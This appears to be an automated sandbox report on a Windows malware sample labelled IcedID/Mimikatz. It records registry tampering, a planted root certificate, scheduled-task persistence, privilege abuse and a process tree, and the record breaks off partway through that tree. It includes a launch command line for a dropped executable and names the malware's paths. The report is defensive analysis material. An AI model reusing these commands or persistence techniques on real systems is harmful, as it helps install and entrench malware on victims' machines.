2025-01-13_e5486dcf3693cdc92bc25a159420f058_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2256 cmd.exe 1960 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral1/files/0x000800000001919c-5.dat nsis_installer_2 behavioral1/files/0x0004000000004ed7-15.dat nsis_installer_1 behavioral1/files/0x0004000000004ed7-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 lgeptip.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4CDEF9B0-9C54-423F-A9AF-D86B60EA8D8C}\WpadDecisionReason = "1" lgeptip.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump rpuessgip.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" rpuessgip.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" lgeptip.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4CDEF9B0-9C54-423F-A9AF-D86B60EA8D8C}\WpadDecisionTime = a0d816c06365db01 lgeptip.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates lgeptip.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-85-33-f6-e0-d6\WpadDecisionTime = 20a5f08a6365db01 lgeptip.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" rpuessgip.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs lgeptip.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates lgeptip.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 lgeptip.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f019e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 lgeptip.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing lgeptip.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed lgeptip.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates lgeptip.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs lgeptip.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings lgeptip.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4CDEF9B0-9C54-423F-A9AF-D86B60EA8D8C} lgeptip.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs lgeptip.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-85-33-f6-e0-d6\WpadDecisionTime = a0d816c06365db01 lgeptip.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" lgeptip.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump rpuessgip.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates lgeptip.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA lgeptip.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust lgeptip.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My lgeptip.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump rpuessgip.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates lgeptip.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs lgeptip.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ lgeptip.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" rpuessgip.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs lgeptip.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f019e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 lgeptip.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections lgeptip.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals rpuessgip.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" rpuessgip.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs lgeptip.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump rpuessgip.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs lgeptip.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates lgeptip.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4CDEF9B0-9C54-423F-A9AF-D86B60EA8D8C}\WpadDecisionTime = 20a5f08a6365db01 lgeptip.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" rpuessgip.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" lgeptip.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 lgeptip.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 lgeptip.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1960 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2132 schtasks.exe 2108 schtasks.exe 2232 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 2952 lgeptip.exe 2036 lgeptip.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe -
Suspicious behavior: LoadsDriver 31 IoCs
pid Process 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2096 2025-01-13_e5486dcf3693cdc92bc25a159420f058_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 2096 2025-01-13_e5486dcf3693cdc92bc25a159420f058_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1864 lgeptip.exe Token: SeDebugPrivilege 2124 lgeptip.exe Token: SeDebugPrivilege 2532 vfshost.exe Token: SeAuditPrivilege 2760 svchost.exe Token: SeDebugPrivilege 2404 rpuessgip.exe Token: SeShutdownPrivilege 2404 rpuessgip.exe Token: SeLockMemoryPrivilege 2100 yerzvn.exe Token: SeLockMemoryPrivilege 2100 yerzvn.exe Token: SeDebugPrivilege 2900 rpuessgip.exe Token: SeShutdownPrivilege 2900 rpuessgip.exe Token: SeDebugPrivilege 2892 rpuessgip.exe Token: SeShutdownPrivilege 2892 rpuessgip.exe Token: SeDebugPrivilege 2596 rpuessgip.exe Token: SeShutdownPrivilege 2596 rpuessgip.exe Token: SeDebugPrivilege 2192 rpuessgip.exe Token: SeShutdownPrivilege 2192 rpuessgip.exe Token: SeDebugPrivilege 1936 rpuessgip.exe Token: SeShutdownPrivilege 1936 rpuessgip.exe Token: SeDebugPrivilege 1972 rpuessgip.exe Token: SeShutdownPrivilege 1972 rpuessgip.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2096 2025-01-13_e5486dcf3693cdc92bc25a159420f058_hacktools_icedid_mimikatz.exe 2096 2025-01-13_e5486dcf3693cdc92bc25a159420f058_hacktools_icedid_mimikatz.exe 1864 lgeptip.exe 1864 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2952 lgeptip.exe 2952 lgeptip.exe 1736 xohudmc.exe 644 ooeaya.exe 2036 lgeptip.exe 2036 lgeptip.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2096 wrote to memory of 2256 2096 2025-01-13_e5486dcf3693cdc92bc25a159420f058_hacktools_icedid_mimikatz.exe 30 PID 2096 wrote to memory of 2256 2096 2025-01-13_e5486dcf3693cdc92bc25a159420f058_hacktools_icedid_mimikatz.exe 30 PID 2096 wrote to memory of 2256 2096 2025-01-13_e5486dcf3693cdc92bc25a159420f058_hacktools_icedid_mimikatz.exe 30 PID 2096 wrote to memory of 2256 2096 2025-01-13_e5486dcf3693cdc92bc25a159420f058_hacktools_icedid_mimikatz.exe 30 PID 2256 wrote to memory of 1960 2256 cmd.exe 32 PID 2256 wrote to memory of 1960 2256 cmd.exe 32 PID 2256 wrote to memory of 1960 2256 cmd.exe 32 PID 2256 wrote to memory of 1960 2256 cmd.exe 32 PID 2256 wrote to memory of 1864 2256 cmd.exe 33 PID 2256 wrote to memory of 1864 2256 cmd.exe 33 PID 2256 wrote to memory of 1864 2256 cmd.exe 33 PID 2256 wrote to memory of 1864 2256 cmd.exe 33 PID 2124 wrote to memory of 2728 2124 lgeptip.exe 35 PID 2124 wrote to memory of 2728 2124 lgeptip.exe 35 PID 2124 wrote to memory of 2728 2124 lgeptip.exe 35 PID 2124 wrote to memory of 2728 2124 lgeptip.exe 35 PID 2728 wrote to memory of 3040 2728 cmd.exe 37 PID 2728 wrote to memory of 3040 2728 cmd.exe 37 PID 2728 wrote to memory of 3040 2728 cmd.exe 37 PID 2728 wrote to memory of 3040 2728 cmd.exe 37 PID 2728 wrote to memory of 2756 2728 cmd.exe 38 PID 2728 wrote to memory of 2756 2728 cmd.exe 38 PID 2728 wrote to memory of 2756 2728 cmd.exe 38 PID 2728 wrote to memory of 2756 2728 cmd.exe 38 PID 2728 wrote to memory of 3032 2728 cmd.exe 39 PID 2728 wrote to memory of 3032 2728 cmd.exe 39 PID 2728 wrote to memory of 3032 2728 cmd.exe 39 PID 2728 wrote to memory of 3032 2728 cmd.exe 39 PID 2728 wrote to memory of 2608 2728 cmd.exe 40 PID 2728 wrote to memory of 2608 2728 cmd.exe 40 PID 2728 wrote to memory of 2608 2728 cmd.exe 40 PID 2728 wrote to memory of 2608 2728 cmd.exe 40 PID 2728 wrote to memory of 2900 2728 cmd.exe 41 PID 2728 wrote to memory of 2900 2728 cmd.exe 41 PID 2728 wrote to memory of 2900 2728 cmd.exe 41 PID 2728 wrote to memory of 2900 2728 cmd.exe 41 PID 2728 wrote to memory of 2888 2728 cmd.exe 42 PID 2728 wrote to memory of 2888 2728 cmd.exe 42 PID 2728 wrote to memory of 2888 2728 cmd.exe 42 PID 2728 wrote to memory of 2888 2728 cmd.exe 42 PID 2124 wrote to memory of 2884 2124 lgeptip.exe 44 PID 2124 wrote to memory of 2884 2124 lgeptip.exe 44 PID 2124 wrote to memory of 2884 2124 lgeptip.exe 44 PID 2124 wrote to memory of 2884 2124 lgeptip.exe 44 PID 2124 wrote to memory of 2596 2124 lgeptip.exe 46 PID 2124 wrote to memory of 2596 2124 lgeptip.exe 46 PID 2124 wrote to memory of 2596 2124 lgeptip.exe 46 PID 2124 wrote to memory of 2596 2124 lgeptip.exe 46 PID 2124 wrote to memory of 2332 2124 lgeptip.exe 48 PID 2124 wrote to memory of 2332 2124 lgeptip.exe 48 PID 2124 wrote to memory of 2332 2124 lgeptip.exe 48 PID 2124 wrote to memory of 2332 2124 lgeptip.exe 48 PID 2124 wrote to memory of 1908 2124 lgeptip.exe 50 PID 2124 wrote to memory of 1908 2124 lgeptip.exe 50 PID 2124 wrote to memory of 1908 2124 lgeptip.exe 50 PID 2124 wrote to memory of 1908 2124 lgeptip.exe 50 PID 1908 wrote to memory of 1616 1908 cmd.exe 52 PID 1908 wrote to memory of 1616 1908 cmd.exe 52 PID 1908 wrote to memory of 1616 1908 cmd.exe 52 PID 1908 wrote to memory of 1616 1908 cmd.exe 52 PID 1908 wrote to memory of 1616 1908 cmd.exe 52 PID 1908 wrote to memory of 1616 1908 cmd.exe 52 PID 1908 wrote to memory of 1616 1908 cmd.exe 52 PID 1616 wrote to memory of 2776 1616 wpcap.exe 53
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:556
-
C:\Windows\TEMP\hijqerzbn\yerzvn.exe"C:\Windows\TEMP\hijqerzbn\yerzvn.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-13_e5486dcf3693cdc92bc25a159420f058_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-13_e5486dcf3693cdc92bc25a159420f058_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\knalbupn\lgeptip.exe2⤵
- Loads dropped DLL
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1960
-
-
C:\Windows\knalbupn\lgeptip.exeC:\Windows\knalbupn\lgeptip.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1864
-
-
-
C:\Windows\knalbupn\lgeptip.exeC:\Windows\knalbupn\lgeptip.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
